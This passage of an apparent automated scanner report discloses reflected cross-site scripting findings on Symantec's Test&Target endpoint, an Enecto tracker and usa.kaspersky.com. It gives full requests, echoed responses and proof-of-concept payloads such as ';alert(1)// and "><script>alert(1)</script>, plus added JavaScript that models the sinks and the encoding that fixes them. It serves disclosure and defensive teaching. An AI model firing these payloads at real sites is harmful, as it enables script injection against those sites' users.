<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st)66983';alert(1)//a3bf71ee914, _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=, _IPV=, _IPC= -->
...[SNIP]...

1.28. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._TRAFFIC_SOURCE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._TRAFFIC_SOURCE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61663'%3balert(1)//ae06d88f6e7 was submitted in the profile._TRAFFIC_SOURCE parameter. This input was echoed as 61663';alert(1)//ae06d88f6e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom61663'%3balert(1)//ae06d88f6e7&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:08 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom61663';alert(1)//ae06d88f6e7, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=, _IPV=, _IPC= -->
...[SNIP]...

1.29. http://trk.enecto.com/trk/3 [z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.enecto.com
Path:   /trk/3

Issue detail

The value of the z request parameter is copied into a single-quoted JavaScript string literal in a response served as application/x-javascript. The payload 60349<script>alert(1)</script>94bfd79debe was submitted in the z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows that the parameter is reflected without any encoding. Note that in the response captured below the payload lands inside a JavaScript string, not in HTML, so the <script> markup itself does not execute in that position. Because the reflection is unmodified, a payload that closes the single-quoted string (the '%3balert(1)// form used against symantec.tt.omtrdc.net in 1.20 to 1.28) is the one this context calls for; the scanner did not submit it here.

Request

GET /trk/3?z=e6e604ff60349<script>alert(1)</script>94bfd79debe&c=8a8484e52ca20cfe012d08efc11a2010&m=http:&s=null&i=pv&y=1319387831443&e=UTF-8&d=de.trendmicro.com&p=%2Fde%2Fhome%2F&q=&t=Antiviren-%20und%20Content-Security-Software%20%7C%20Securing%20Your%20Web%20World%20-%20Trend%20Micro%20DE&r=http%3A%2F%2Fus.trendmicro.com%2Fus%2Ftrendwatch%2Fcloud%2Fsmart-protection-network%2F&a=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.202%20Safari%2F535.1 HTTP/1.1
Host: trk.enecto.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://de.trendmicro.com/de/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:37:27 GMT
Server: Apache
X-Powered-By: Enecto
Vary: Accept-Encoding
Content-Length: 164
Connection: close
Content-Type: application/x-javascript;charset=ISO-8859-1

_epf._reqs['e6e604ff60349<script>alert(1)</script>94bfd79debe'] = '8a8482b332ecaa81013331a4da54161b';
_epf.cb('e6e604ff60349<script>alert(1)</script>94bfd79debe');
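
The findings above (1.20 to 1.29) share one sink: a request parameter concatenated into a single-quoted JavaScript string literal. The following is an added example, not code from the XSS.CX report, from Adobe Test&Target or from Enecto. It models that sink with a hypothetical template, shows why the report's payload `';alert(1)//` terminates the literal while the raw `<script>` payload of 1.29 does not, and contrasts it with a context-aware encoder that keeps the same value inert. The template shape, the allow-list and every function name are assumptions made for illustration; the two payloads are copied from findings 1.20 and 1.29.

```javascript
'use strict';

// Added example, not code from the XSS.CX report, Adobe Test&Target or Enecto.
// Models the reflected single-quoted JavaScript string of findings 1.20-1.29.
// The template shape and all function names are assumptions for illustration.

// Hypothetical vulnerable template: the request parameter is concatenated into
// a single-quoted string passed to document.write(), as the responses show.
function renderUnsafe(value) {
  return "document.write('<!-- _IPC=" + value + " -->');";
}

// Encoder for the JS-string context: everything outside a small allow-list is
// emitted as \xHH or \uHHHH. This neutralises ' \ and newlines (which end the
// literal), U+2028/U+2029 (JS line terminators) and < > / so that an inline
// script can never be closed by "</script>" from inside the literal.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,.\-_:=]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

function renderSafe(value) {
  return "document.write('<!-- _IPC=" + encodeForJsString(value) + " -->');";
}

// Minimal scanner for a single-quoted JS string literal; `start` is the index
// of the opening quote. Returns the decoded content up to the first unescaped
// quote, or null if the literal never closes. Handles the escapes emitted above.
function readSingleQuotedLiteral(src, start) {
  let out = '';
  for (let i = start + 1; i < src.length; i++) {
    const ch = src[i];
    if (ch === "'") return out;
    if (ch === '\\') {
      const next = src[i + 1];
      if (next === 'x') { out += String.fromCharCode(parseInt(src.slice(i + 2, i + 4), 16)); i += 3; continue; }
      if (next === 'u') { out += String.fromCharCode(parseInt(src.slice(i + 2, i + 6), 16)); i += 5; continue; }
      out += next; i += 1; continue;   // \' \\ \/ and similar
    }
    out += ch;
  }
  return null;
}

// True when the literal the template meant to emit still holds the whole value.
// If the scanner closes the string early, whatever follows is parsed as code,
// which is exactly what eaf74';alert(1)//... achieves in finding 1.20.
function literalIntact(rendered, value) {
  const literal = readSingleQuotedLiteral(rendered, rendered.indexOf("('") + 1);
  return literal !== null && literal === '<!-- _IPC=' + value + ' -->';
}

// Payloads copied from the report (findings 1.20 and 1.29).
const QUOTE_BREAK = "eaf74';alert(1)//28c1bcc212f";
const SCRIPT_TAG = 'e6e604ff60349<script>alert(1)</script>94bfd79debe';

for (const p of [QUOTE_BREAK, SCRIPT_TAG]) {
  console.log('unsafe intact:', literalIntact(renderUnsafe(p), p),
              ' safe intact:', literalIntact(renderSafe(p), p));
  console.log(renderSafe(p));
}
```

Two things the output makes visible. First, the `<script>` payload of 1.29 leaves the literal intact, which is why it is harmless in an external script resource but would still end an inline `<script>` element; the encoder removes that risk by escaping `<` and `/`. Second, this encoder only addresses the JavaScript-string layer. Because document.write() then parses the decoded string as HTML, the value also sits inside an HTML comment, and a value containing `-->` would still close that comment after decoding; the HTML layer needs its own encoding, or, as the report's remediation says, the value should not be echoed into script at all.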

1.30. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c24f"><script>alert(1)</script>e204753faca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4c24f"><script>alert(1)</script>e204753faca=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.av-comparatives.org/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:26:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387189"
Content-Type: text/html; charset=utf-8
Content-Length: 44076
Date: Sun, 23 Oct 2011 16:26:32 GMT
X-Varnish: 1652536625
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?4c24f"><script>alert(1)</script>e204753faca=1" />
...[SNIP]...

1.31. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b168b"><script>alert(1)</script>08a34ba8bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesb168b"><script>alert(1)</script>08a34ba8bb1/search/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:14:07 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390047"
Content-Type: text/html; charset=utf-8
Content-Length: 40928
Date: Sun, 23 Oct 2011 17:14:10 GMT
X-Varnish: 1652689590
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modulesb168b"><script>alert(1)</script>08a34ba8bb1/search/search.css?3" />
...[SNIP]...

1.32. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97778"-alert(1)-"44132cf691b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules97778"-alert(1)-"44132cf691b/search/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:14:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390065"
Content-Type: text/html; charset=utf-8
Content-Length: 40480
Date: Sun, 23 Oct 2011 17:14:42 GMT
X-Varnish: 1652690838
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
es') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules97778"-alert(1)-"44132cf691b/search/search.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
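The same two sinks recur throughout findings 1.31 to 1.44: a <link rel="canonical"> whose href is the request URL (attribute context), and on the 404 page the SiteCatalyst s.pageName assignment that embeds the request URL in a double-quoted JavaScript string (script context). What follows is an added example, not code from the report or from the site: it rebuilds both sinks as small template functions from the response fragments above, runs the report's own payloads from 1.31 and 1.32 through them, and shows the context-specific encoding that keeps the data inside the quotes. The template functions, the stub alert() and the check functions are assumptions made for the example; the server-side code that produced the real pages is not on the page.

```javascript
// Added example (not from the report): the two usa.kaspersky.com sinks shown
// in findings 1.31 (canonical <link> href) and 1.32 (s.pageName string on the
// 404 page), rebuilt as templates. The raw versions concatenate the request
// URL the way the responses show; the safe versions encode per context.
// The templates reconstruct the output only; the real server code is not known.

const ATTR_PAYLOAD = 'b168b"><script>alert(1)</script>08a34ba8bb1'; // report, 1.31
const JS_PAYLOAD = '97778"-alert(1)-"44132cf691b';                  // report, 1.32

function requestUrl(payload) {
  return 'http://usa.kaspersky.com/modules' + payload + '/search/search.css?3';
}

// Sink 1 as emitted: the URL lands inside a double-quoted attribute value.
function canonicalLinkRaw(url) {
  return '<link rel="canonical" href="' + url + '" />';
}

// Sink 2 as emitted: the URL lands inside a double-quoted JS string literal in
// an inline <script>. A '"' in the data ends the literal, so
// "…97778"-alert(1)-"44132…" parses as a subtraction whose middle operand is a
// function call: alert() runs while the page is parsed.
function pageNameScriptRaw(url) {
  return 's.pageName="404:' + url + '";';
}

// Context 1 encoder: HTML attribute value. Encoding & < > " ' keeps the data
// inside the quotes no matter which tag or attribute it sits in.
function encodeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Context 2 encoder: JS string literal inside an inline <script>.
// JSON.stringify escapes quotes, backslashes and control characters but leaves
// < and > alone, and the HTML parser ends a <script> block at the first
// "</script" regardless of JS quoting. Escaping < > (and the two line
// terminators JSON.stringify does not escape) as \uXXXX closes that gap.
function encodeJsString(s) {
  return JSON.stringify(s).replace(/[<>\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function canonicalLinkSafe(url) {
  return '<link rel="canonical" href="' + encodeHtmlAttr(url) + '" />';
}

function pageNameScriptSafe(url) {
  return 's.pageName=' + encodeJsString('404:' + url) + ';';
}

// Check for sink 1: count the tags an HTML parser would see. The template emits
// exactly one (<link>); anything beyond that came out of the data.
function tagCount(html) {
  return (html.match(/<[a-zA-Z\/]/g) || []).length;
}

// Check for sink 2: run the generated statement with a stub alert() and a fresh
// `s` object, and report whether attacker code ran and what the page name ended
// up as. new Function is used here only as a test harness.
function runPageNameScript(script) {
  const calls = [];
  const s = {};
  new Function('s', 'alert', script)(s, (v) => { calls.push(v); });
  return { alertCalls: calls.length, pageName: s.pageName };
}

// Demo: the report's payloads through both sinks, raw and encoded.
const attrUrl = requestUrl(ATTR_PAYLOAD);
const jsUrl = requestUrl(JS_PAYLOAD);
console.log('attribute sink, raw tags: ', tagCount(canonicalLinkRaw(attrUrl)));  // 3
console.log('attribute sink, safe tags:', tagCount(canonicalLinkSafe(attrUrl))); // 1
console.log('script sink, raw: ', runPageNameScript(pageNameScriptRaw(jsUrl)));  // alert called once, pageName NaN
console.log('script sink, safe:', runPageNameScript(pageNameScriptSafe(jsUrl))); // no alert, pageName intact
```

Run with node. The point the script-sink check makes is the one the remediation text above leaves implicit: escaping only the quote character is not enough inside an inline <script>, because the HTML parser cuts the block at the first </script before the JavaScript engine sees any quoting, which is why < and > are escaped as \u003c and \u003e as well.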

1.33. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54ddb"><script>alert(1)</script>50a7a4548a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search54ddb"><script>alert(1)</script>50a7a4548a9/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:15:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390150"
Content-Type: text/html; charset=utf-8
Content-Length: 40631
Date: Sun, 23 Oct 2011 17:15:55 GMT
X-Varnish: 1652695929
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search54ddb"><script>alert(1)</script>50a7a4548a9/search.css?3" />
...[SNIP]...

1.34. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b116"-alert(1)-"ce9764fe5ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/search8b116"-alert(1)-"ce9764fe5ac/search.css?3 HTTP/1.1
Host: usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:16:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390176"
Content-Type: text/html; charset=utf-8
Content-Length: 30771
Date: Sun, 23 Oct 2011 17:16:22 GMT
X-Varnish: 1652697279
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search8b116"-alert(1)-"ce9764fe5ac/search.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.35. http://usa.kaspersky.com/products-services/home-computer-security/one [ICID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1bc1"><script>alert(1)</script>87e5638e6e6 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/one?ICID=INT1674070f1bc1"><script>alert(1)</script>87e5638e6e6 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387693"
Content-Type: text/html; charset=utf-8
Content-Length: 78529
Date: Sun, 23 Oct 2011 16:35:28 GMT
X-Varnish: 1652562249
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070f1bc1"><script>alert(1)</script>87e5638e6e6" />
...[SNIP]...

1.36. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbd00"-alert(1)-"9a65bf5e617 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-servicesdbd00"-alert(1)-"9a65bf5e617/home-computer-security/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387787"
Content-Type: text/html; charset=utf-8
Content-Length: 41002
Date: Sun, 23 Oct 2011 16:36:31 GMT
X-Varnish: 1652567491
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
